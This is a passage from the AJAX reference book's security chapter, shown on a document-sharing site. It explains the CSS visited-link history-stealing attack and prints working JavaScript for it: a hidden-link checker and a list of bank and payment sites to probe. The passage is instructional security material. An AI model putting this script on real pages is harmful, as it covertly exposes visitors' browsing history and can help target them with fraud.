issuhub.com

AJAX - The Complete Reference

(avery) #1

PART II


Chapter 7: Security Concerns 321


Hackers would like to know what sites you have visited. As it turns out, if you visit the

hacker’s site or a site they have compromised, they can tell fairly easily whether you have

visited a site they are interested in or not. They do this by exploiting the subtle information

leakage from a visited link indicator. Recall that a browser will automatically distinguish

between a visited and nonvisited link, by default making visited links another style usually

by setting it to the color purple. The hacker will take a list of sites either embedded or

fetched and check them one at a time:

var stealhistorysites = new Array("http://www.google.com/", "http://ajaxref

.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica

.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/",

"https://home.americanexpress.com/", "https://www.paypal.com/");

for (var i=0;i<stealhistorysites.length;i++)

if (checkHistory(stealhistorysites[i]))

responseOutput.innerHTML += stealhistorysites[i] + "<br />";

To check if you have been there, they will simply make sure they have set some style

rules to indicate what the look of the visited and nonvisited links will be.

<style type="text/css">

a.stealhistory:link{color:#FF0000}

a.stealhistory:visited{color:#00FF00}

</style>

Then the hack script will use DOM methods to add each tested URL into the page in a

hidden manner and see what its rendered style is. If the links display as visited, the hacker

knows that you have been there since your last time of purging history;

if not, you either purge history often or you haven’t been there.

function checkHistory(url)

{

var found = false;

var link = document.createElement("a");

link.className = "stealhistory";

link.href = url;

link.appendChild(document.createTextNode("stealhistory"));

link.style.visibility = "hidden";

document.body.appendChild(link);

var color = getStyle(link,"color").toLowerCase();

document.body.removeChild(link);

if(color == "rgb(0, 255, 0)" || color == "#00ff00")

found = true;

return found;

}

A sample history stealing example is shown in Figure 7-12 and can be found at

http://ajaxref.com/ch7/history.html.
Free download pdf
Get our desktop app
Company
Features
Documentation
Resources
© ISSUHUB. 2024. All rights reserved.